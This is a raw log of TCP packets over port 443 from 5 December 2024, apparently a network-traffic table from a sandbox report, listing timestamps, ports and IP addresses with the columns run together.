                                                                                                              Dec 5, 2024 10:38:36.287266016 CET4434978713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.287707090 CET49787443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.287714005 CET4434978713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.288114071 CET49787443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.288120031 CET4434978713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.289143085 CET4434978813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.289467096 CET49788443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.289485931 CET4434978813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.289983988 CET49788443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.289989948 CET4434978813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.605051041 CET4434978993.95.216.175192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.605674028 CET49789443192.168.2.693.95.216.175
                                                                                                              Dec 5, 2024 10:38:36.608515978 CET49789443192.168.2.693.95.216.175
                                                                                                              Dec 5, 2024 10:38:36.608522892 CET4434978993.95.216.175192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.608788013 CET4434978993.95.216.175192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.612466097 CET49789443192.168.2.693.95.216.175
                                                                                                              Dec 5, 2024 10:38:36.655324936 CET4434978993.95.216.175192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.718485117 CET4434978613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.718547106 CET4434978613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.718661070 CET49786443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.721564054 CET4434978713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.721618891 CET4434978713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.721673012 CET49787443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.722615957 CET4434978513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.722692966 CET4434978513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.722944021 CET49786443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.722970963 CET4434978613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.722986937 CET49786443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.722989082 CET49785443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.722999096 CET4434978613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.723324060 CET4434978813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.723510027 CET4434978813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.723848104 CET49787443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.723864079 CET49788443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.723872900 CET4434978713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.724004030 CET49787443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.724014044 CET4434978713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.724544048 CET49785443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.724555016 CET4434978513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.724591970 CET49788443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.724621058 CET4434978813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.724634886 CET49788443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.724643946 CET4434978813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.726933002 CET49791443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.726958990 CET4434979113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.727050066 CET49791443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.727844000 CET49791443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.727849960 CET4434979113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.728866100 CET49792443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.728905916 CET4434979213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.728992939 CET49792443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.729095936 CET49792443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.729103088 CET4434979213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.730169058 CET49793443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.730194092 CET4434979313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.730263948 CET49793443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.730705976 CET49793443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.730715990 CET4434979313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.731357098 CET49794443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.731369019 CET4434979413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:36.731528997 CET49794443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.731646061 CET49794443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:36.731651068 CET4434979413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:37.162332058 CET4434978993.95.216.175192.168.2.6
                                                                                                              Dec 5, 2024 10:38:37.162368059 CET4434978993.95.216.175192.168.2.6
                                                                                                              Dec 5, 2024 10:38:37.162446976 CET49789443192.168.2.693.95.216.175
                                                                                                              Dec 5, 2024 10:38:37.162472010 CET4434978993.95.216.175192.168.2.6
                                                                                                              Dec 5, 2024 10:38:37.162487984 CET4434978993.95.216.175192.168.2.6
                                                                                                              Dec 5, 2024 10:38:37.162554979 CET49789443192.168.2.693.95.216.175
                                                                                                              Dec 5, 2024 10:38:37.201631069 CET49789443192.168.2.693.95.216.175
                                                                                                              Dec 5, 2024 10:38:37.993741035 CET4434979013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.001651049 CET49790443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.001667023 CET4434979013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.002129078 CET49790443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.002136946 CET4434979013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.428002119 CET4434979013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.428066015 CET4434979013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.428121090 CET49790443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.433238983 CET49790443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.433269024 CET4434979013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.433284044 CET49790443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.433290958 CET4434979013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.443861961 CET49795443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.443906069 CET4434979513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.443965912 CET49795443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.447900057 CET4434979313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.448492050 CET4434979113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.448792934 CET4434979213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.448939085 CET4434979413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.472069979 CET49794443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.472110033 CET4434979413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.472779036 CET49794443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.472784996 CET4434979413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.473118067 CET49792443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.473126888 CET4434979213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.473579884 CET49792443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.473586082 CET4434979213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.473927975 CET49795443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.473951101 CET4434979513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.475116968 CET49793443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.475126028 CET4434979313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.475502968 CET49793443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.475507975 CET4434979313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.475883007 CET49791443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.475897074 CET4434979113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.476296902 CET49791443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.476301908 CET4434979113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.882033110 CET4434979313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.882117987 CET4434979313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.882350922 CET49793443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.883016109 CET4434979413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.883076906 CET4434979413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.883164883 CET49794443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.883435965 CET49794443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.883459091 CET4434979413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.883474112 CET49794443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.883480072 CET4434979413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.883645058 CET49793443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.883645058 CET49793443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.883665085 CET4434979313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.883676052 CET4434979313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.883847952 CET4434979113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.883913040 CET4434979113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.884202957 CET49791443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.885349989 CET49791443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.885368109 CET4434979113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.885381937 CET49791443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.885389090 CET4434979113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.885539055 CET4434979213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.885606050 CET4434979213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.885659933 CET49792443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.886729002 CET49792443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.886737108 CET4434979213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.888612986 CET49796443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.888655901 CET4434979613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.888843060 CET49796443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.889014006 CET49796443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.889028072 CET4434979613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.890522003 CET49797443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.890553951 CET4434979713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.890693903 CET49797443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.890777111 CET49797443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.890784979 CET4434979713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.891736984 CET49798443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.891752958 CET4434979813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.891912937 CET49798443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.892333031 CET49798443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.892345905 CET4434979813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.893640041 CET49799443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.893656015 CET4434979913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:38.893747091 CET49799443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.893987894 CET49799443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:38.894011021 CET4434979913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.187650919 CET4434979513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.189656973 CET49795443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.189677954 CET4434979513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.190150023 CET49795443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.190155029 CET4434979513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.603363991 CET4434979613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.605936050 CET49796443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.605952978 CET4434979613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.607516050 CET49796443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.607532024 CET4434979613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.608104944 CET4434979713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.609812975 CET4434979813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.609837055 CET4434979913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.610753059 CET49797443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.610761881 CET4434979713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.615911007 CET49797443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.615917921 CET4434979713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.624347925 CET4434979513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.624411106 CET4434979513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.624501944 CET49795443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.625647068 CET49795443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.625647068 CET49795443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.625663996 CET4434979513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.625673056 CET4434979513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.651392937 CET49798443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.651416063 CET4434979813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.652281046 CET49798443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.652287960 CET4434979813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.654685020 CET49799443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.654692888 CET4434979913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.655335903 CET49799443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.655344963 CET4434979913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.686697960 CET49801443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.686777115 CET4434980113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:40.686865091 CET49801443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.743036985 CET49801443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:40.743087053 CET4434980113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.038389921 CET4434979613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.038475037 CET4434979613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.038578987 CET49796443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.039330006 CET49796443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.039330006 CET49796443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.039355993 CET4434979613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.039366961 CET4434979613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.041542053 CET4434979713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.041605949 CET4434979713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.041728020 CET49797443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.043515921 CET4434979913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.043581009 CET4434979913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.043793917 CET49799443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.044203997 CET4434979813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.044258118 CET4434979813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.045913935 CET49798443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.051095009 CET49797443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.051106930 CET4434979713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.051132917 CET49797443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.051139116 CET4434979713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.051345110 CET49799443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.051345110 CET49799443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.051351070 CET4434979913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.051357985 CET4434979913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.051713943 CET49798443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.051713943 CET49798443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.051739931 CET4434979813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.051748991 CET4434979813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.062633991 CET49802443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.062696934 CET4434980213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.062767029 CET49802443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.063915014 CET49803443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.063951015 CET4434980313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.064035892 CET49803443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.065190077 CET49804443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.065210104 CET4434980413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.065269947 CET49804443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.065424919 CET49804443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.065440893 CET4434980413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.067071915 CET49805443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.067101002 CET4434980513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.067204952 CET49802443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.067226887 CET4434980213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.067234993 CET49805443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.067372084 CET49805443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.067384005 CET4434980513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:41.067666054 CET49803443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:41.067682981 CET4434980313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.458754063 CET4434980113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.467243910 CET49801443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.467261076 CET4434980113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.467924118 CET49801443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.467935085 CET4434980113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.778153896 CET4434980413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.783000946 CET4434980313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.783611059 CET4434980513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.784483910 CET4434980213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.810568094 CET49803443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.810580015 CET4434980313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.814233065 CET49803443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.814239025 CET4434980313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.814368010 CET49804443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.814403057 CET4434980413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.815201998 CET49804443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.815207958 CET4434980413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.824603081 CET49802443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.824632883 CET4434980213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.825712919 CET49802443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.825726032 CET4434980213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.834000111 CET49805443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.834012032 CET4434980513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.834419012 CET49805443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.834424973 CET4434980513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.893663883 CET4434980113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.893735886 CET4434980113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.893815994 CET49801443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.894401073 CET49801443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.894411087 CET4434980113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.900490999 CET49808443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.900512934 CET4434980813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:42.900590897 CET49808443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.901187897 CET49808443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:42.901202917 CET4434980813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.215287924 CET4434980413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.215362072 CET4434980413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.215456009 CET49804443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.217601061 CET4434980513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.217667103 CET4434980513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.217804909 CET49805443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.218929052 CET4434980213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.219003916 CET4434980213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.219088078 CET49802443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.219664097 CET4434980313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.219723940 CET4434980313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.219769001 CET49803443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.227715969 CET49804443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.227751017 CET4434980413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.227804899 CET49805443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.227817059 CET4434980513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.227845907 CET49805443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.227854013 CET4434980513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.227910995 CET49802443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.227952957 CET4434980213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.227969885 CET49802443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.227973938 CET49803443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.227977991 CET4434980213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.228004932 CET4434980313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.228029013 CET49803443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.228037119 CET4434980313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.244455099 CET49809443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.244488955 CET4434980913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.244599104 CET49809443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.244980097 CET49809443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.244995117 CET4434980913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.253314018 CET49810443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.253371954 CET4434981013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.253525972 CET49810443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.253659010 CET49810443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.253680944 CET4434981013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.265752077 CET49811443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.265794992 CET4434981113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.265923023 CET49811443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.266710997 CET49811443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.266724110 CET4434981113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.275892019 CET49812443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.275928974 CET4434981213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.276034117 CET49812443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.276396990 CET49812443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:43.276407003 CET4434981213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.385484934 CET49814443192.168.2.652.113.195.132
                                                                                                              Dec 5, 2024 10:38:43.385535002 CET4434981452.113.195.132192.168.2.6
                                                                                                              Dec 5, 2024 10:38:43.385602951 CET49814443192.168.2.652.113.195.132
